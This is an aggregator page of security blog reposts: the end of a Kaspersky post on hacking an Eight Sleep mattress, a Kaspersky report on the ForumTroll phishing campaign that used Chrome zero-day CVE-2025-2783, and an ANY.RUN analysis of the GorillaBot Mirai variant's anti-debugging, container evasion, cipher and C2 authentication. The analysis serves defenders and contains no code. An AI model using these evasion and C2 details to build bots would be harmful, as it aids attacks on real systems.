Dylan replaced the Eight Sleep Hub with… a common aquarium chiller. This system, in contrast, doesn’t require an app or a subscription fee, collects no user data, comes without any backdoors, and runs perfectly well without an internet connection. What it does do is effectively adjust the temperature of your bed, and, just as importantly, it costs only $150.
For those who prefer a less radical approach to the issue of Eight Sleep products being tied to the vendor cloud, Free Sleep offers a solution. This is an open-source software suite that allows you to take control of your smart mattress.
Want to know what other unexpected devices have been successfully hacked? Here you go!…
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-26 15:06:562025-03-26 15:06:56How to hack an Eight Sleep smart mattress “Pod” | Kaspersky official blog
Our exploit detection and prevention technologies have detected a new wave of cyberattacks with previously unknown malware. While analyzing it, our Global Research and Analysis Team (GReAT) experts realized that we’re dealing with a technically sophisticated targeted attack, which suggests that a state-sponsored APT group is behind it. The attack exploited a zero-day vulnerability in the Chrome browser, which we immediately reported to Google; the company promptly released a patch to fix it.
What is the Operation ForumTroll APT attack?
The attack starts with an email with a phishing invitation to the Primakov Readings international economic and political science forum. There are two links in the email’s body, which pretend to lead to the program of the event and the registration form for participants, but which actually lead to the malefactor’s website. If a Windows PC user with the Google Chrome browser (or any other browser based on the Chromium engine) clicks them, their computer gets infected with no additional action required from the victim’s side.
Next, the exploit for the CVE-2025-2783 vulnerability comes into play — helping to circumvent the Chrome browser’s defense mechanism. It’s too early to talk about technical details, but the essence of the vulnerability comes down to an error in logic at the intersection of Chrome and the Windows operating system that allows bypassing the browser’s sandbox protection.
A slightly more detailed technical description of the attack along with the indicators of compromise can be found on our Securelist blog. Our GReAT experts will publish a thorough technical analysis of the vulnerability and APT attack once the majority of browser users install the newly-released patch.
Who are the targets of the Operation ForumTroll APT attack?
Fake event invitations containing personalized links were sent to Russian media representatives, employees of educational institutions and governmental organizations. According to our GReAT experts the goal of the attackers was espionage.
How to stay safe
At the time of writing this post, the attack was no longer active: the phishing link redirected users to the legitimate Primakov Readings website. However, the malefactors could reactivate the exploit delivery mechanism at any time and start the next wave of the attack.
Thanks to our experts’ analysis, Google Chrome’s developers have promptly fixed the CVE-2025-2783 vulnerability today, and thus we advise you to check that your organization uses the browser updated to at least the 134.0.6998.177/.178 version.
In addition, we recommend using reliable security solutions equipped with modern exploit detection and prevention technologies on all internet-connected corporate devices. Our products successfully detect all exploits and other malware used in this APT attack.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-25 22:06:482025-03-25 22:06:48CVE-2025-2783 in Operation ForumTroll APT | Kaspersky official blog
Editor’s note: The current article is authored by Mohamed Talaat, a cybersecurity researcher and malware analyst. You can find Mohamed on X and LinkedIn.
In this article, we’re diving into GorillaBot, a newly discovered botnet built on Mirai’s code. It’s been spotted launching hundreds of thousands of attacks across the globe, and it’s got some interesting tricks up its sleeve.
We’ll walk through how it talks to its command-and-control (C2) servers, how it receives instructions, and the methods it uses to carry out attacks.
Overview
“GorillaBot” is a newly discovered Mirai-based botnet that has been actively targeting systems in over 100 countries. According to the NSFOCUS Global Threat Hunting team, the botnet issued more than 300,000 attack commands between September 4 and September 27.
This malware variant poses a serious cyber threat, affecting a wide range of industries — including telecommunications, financial institutions, and even the education sector — prompting an urgent need for response and mitigation.
Key Takeaways
GorillaBot is a Mirai-based botnet that reuses core logic while adding custom encryption and evasion techniques.
It targets a wide range of industries and has launched over 300,000 attacks across more than 100 countries.
The botnet uses raw TCP sockets and a custom XTEA-like cipher for secure C2 communication.
GorillaBot includes anti-debugging and anti-analysis checks, exiting immediately in containerized or honeypot environments.
The malware authenticates to its C2 server using a SHA-256-based token generated from a hardcoded array and server-provided value.
Attack commands are encoded and hashed, then passed to a Mirai-style attack_parse function for execution.
Technical Analysis
In this section, we will examine the technical details of GorillaBot, focusing on its C2 communication protocol and how it receives information about its targets and the attack methods it’s instructed to use.
Anti-Debugging
Before proceeding with its main activity, GorillaBot performs checks to detect the presence of debugging tools. One of its first actions is to read the /proc/self/status file and inspect the TracerPid field. This field indicates whether the process is being traced – a value of 0 means it’s not, while a non-zero value suggests a debugger is attached.
The process of reading the /proc/self/status file and inspect the TracerPid field
Another technique that “GorillaBot” uses to detect debuggers is to register a callback function that will pause and then exit upon receiving a SIGTRAP signal.
Detection of debuggers by Gorillabot
Environment check
GorillaBot is highly selective about the environment it runs in. It first ensures that it is operating on a legitimate target machine rather than inside a honeypot or container. To do this, it performs several checks for system-level artifacts that may not be present in those scenarios.
The code shows that it initially checks for access to the “/proc” file system – a virtual file system that provides user-space processes with information about the kernel and running processes.
In a typical Linux environment, the presence of the “/proc” file system is expected. If it’s missing, GorillaBot assumes it is being analyzed in a honeypot and exits immediately.
/proc check to detect non-standard environments
GorillaBot uses another check to detect Kubernetes containerization by examining a specific file in the “/proc” directory, namely “/proc/1/cgroup.” It looks for the string “kubepods.” If this string is found, GorillaBot recognizes that it is running in a container and terminates its execution to avoid detection.
Containerization checks by GorillaBot
Encryption & Decryption Algorithms
One of the more intriguing features of this Mirai-based botnet is its use of encryption and decryption techniques to obscure key strings and hide internal configuration data.
Researchers observed that GorillaBot uses a simple Caesar cipher with a shift of 3 to decrypt specific strings. In addition, it employs a custom block cipher – which we’ll examine later in this article – to decrypt more complex internal configurations. These methods help the malware avoid static detection and make reverse engineering more difficult.
The use of Caesar cipher by GorillaBot
Network Communication
Initial C2 Communication
Like many other Mirai-based botnets, GorillaBot uses raw TCP sockets for command-and-control (C2) communication, rather than higher-level protocols like HTTP or HTTPS.
The process begins with the malware establishing a connection to its C2 server – the server’s IP address is decrypted at runtime using what appears to be a custom implementation of the XTEA (Extended Tiny Encryption Algorithm).
The cipher closely resembles TEA or XTEA, employing a 128-bit (16-byte) hardcoded key for both encryption and decryption.
During each iteration of the algorithm, a delta value is subtracted from the sum.
Decryption of C2 IP using custom XTEA-like algorithm
The function begins by calculating the length of the provided data. It does this by iterating until it encounters the first NULL character.
Once the length is known, it proceeds to pack the key. Since the key is given as a serialized sequence of bytes, it must be organized into an array of four 32-bit words before the function can perform either encryption or decryption.
Key packing and data length calculation before encryption/decryption
After the key is prepared and the data length calculated, the function checks a mode parameter to decide whether to encrypt or decrypt. It then enters a loop to iterate over the data for either process.
Mode parameter check
GorillaBot authentication mechanism with the C2 server
After successfully connecting to the C2 server, the malware initiates the authentication process to identify itself to the server.
This process begins with the malware sending a 1-byte TCP probe packet to the C2 server. In response, the server replies with a 4-byte TCP packet that includes a “magic” 4-byte value. This value is then used to generate the bot ID for the authentication process.
C2 communication shown in ANY.RUN’s Interactive Sandbox
The process begins with a returned 4-byte magic value, which is combined with a 32-byte encrypted array to generate the bot ID or authentication token.
A key aspect of this process is the method used to combine the 32-byte array with the 4-byte magic value to create the token.
Submit suspicious files and URLs to ANY.RUN for proactive analysis of threats targeting your company
The same cipher previously described is applied to decrypt the 32-byte hardcoded array. Once decrypted, the data is copied into a separate buffer and concatenated with the 4-byte magic value.
The combined data is then hashed using SHA-256 before being sent back to the command and control (C2) server as the identification token.
Decrypted array and magic value combined, then hashed with SHA-256
In the screenshot below, you can see the generated SHA-256 token, which is created by combining the 4-byte magic value received from the C2 server with the decrypted 32-byte hardcoded array.
The generated SHA-256 token
The C2 (Command and Control) communication process continues after the C2 server authenticates the botnet.
In response, the server sends a packet that appears to be a flag, labeled “01,” to confirm the bot’s authenticity. On the C2 server side, most likely a list of hashes representing botnet IDs, such as SHA-256, is maintained. This list is used to verify the received ID, ensuring that the connection is from a legitimate bot instance rather than an unauthorized source attempting to interact with the C2 infrastructure.
C2 server responds with 0x01 flag to confirm bot authentication
In the screenshot above, after successfully sending the SHA-256 hash (bot ID), the bot receives a 1-byte response. This response is checked against “01,” which indicates successful authentication. Following this, the bot replies with a 4-byte packet containing the bytes “00 00 00 01.” This is likely the bot acknowledging receipt of the flag packet.
After, GorillaBot exhibits behavior similar to the original Mirai bot. The malware calculates the length of a provided 32-byte ID buffer and sends this length to the command and control (C2) server. Once the length is successfully sent, the malware transmits the actual ID buffer to the server.
Mirai code snippet
The code snippet above is taken from the leaked Mirai source and includes a check for the number of arguments. If a second argument is provided, it is copied to “id_buf,” which has a length of exactly 32 bytes.
This behavior is consistent with that observed in the Mirai-based variant “GorillaBot.” During its initial communication with the command-and-control (C2) server, GorillaBot first sends the length of the buffer, followed by the buffer itself – mirroring the original Mirai implementation.
GorillaBot mimics Mirai by sending buffer length, then the buffer
The screenshot below summarizes the initial C2 communication, validating the connection to ensure it comes from the intended source. This is crucial so that only authenticated connections receive attack commands.
Summary of initial C2 communication
Learn to analyze cyber threats
See a detailed guide to using ANY.RUN’s Interactive Sandbox for malware and phishing analysis
Read full guide
Processing Attack Commands
Once the bot has been authenticated, the next stage in the C2 communication process involves receiving a packet containing attack target information – essentially, instructions to initiate an attack.
In the example screenshot below, we can see that the first step taken is to read the length of the packet. This confirms the malware’s ability to retrieve data over the socket from the command and control (C2) server.
After successfully reading the length, the malware proceeds with execution. It reads the expected length of the attack packet, then uses that length to read the corresponding number of bytes from the C2 server, which constitutes the attack packet.
Reading packet length from C2 server to begin data retrieval
Attack Command packet structure
Below is the structure of the received attack packet along with the corresponding packet capture bytes. The time gap in receiving the length of the entire packet (highlighted in red in the capture) and the actual attack packet is minimal. As a result, it may seem as if they were concatenated into one packet and received simultaneously; however, they were actually received separately.
The packet structure is quite simple. First, there is a 32-byte hash of the entire received packet, referred to as SHA-256 (highlighted in yellow). Following this, the encoded bytes represent the attack command (highlighted in blue), which will be decoded using the same Caesar shift cipher mentioned earlier before being parsed.
Once the integrity of the encoded attack command is verified, it is decoded and passed to “attack_parse.” This function is responsible for extracting target information, determining the specific attack method, and then handing off control to the appropriate attack function for execution.
Decoded attack command passed to attack_parse
The “attack_parse” function closely resembles the original Mirai code, as it processes the provided buffer containing the attack command in a similar manner. Notably, it supports attack commands both with and without options, just like the original Mirai.
Mirai vs. GorillaBot
Conclusion
GorillaBot may not reinvent the wheel, but it’s a strong reminder that old code can still pack a punch when reused in clever ways. By building on Mirai’s foundation and adding its own tweaks to communication, encryption, and evasion techniques, GorillaBot proves that legacy malware lives on and evolves.
To better understand threats like GorillaBot, the use of malware analysis tools like ANY.RUN’s Interactive Sandbox is important. It lets you dive into live malware behavior: from unpacking encrypted payloads to monitoring C2 communication in real time.
Curious to see it in action? Try ANY.RUN now to explore malware samples like GorillaBot hands-on and uncover the tactics they use during attacks to strengthen your defenses.
About ANY.RUN
ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-25 12:06:412025-03-25 12:06:41GorillaBot: Technical Analysis and Code Similarities with Mirai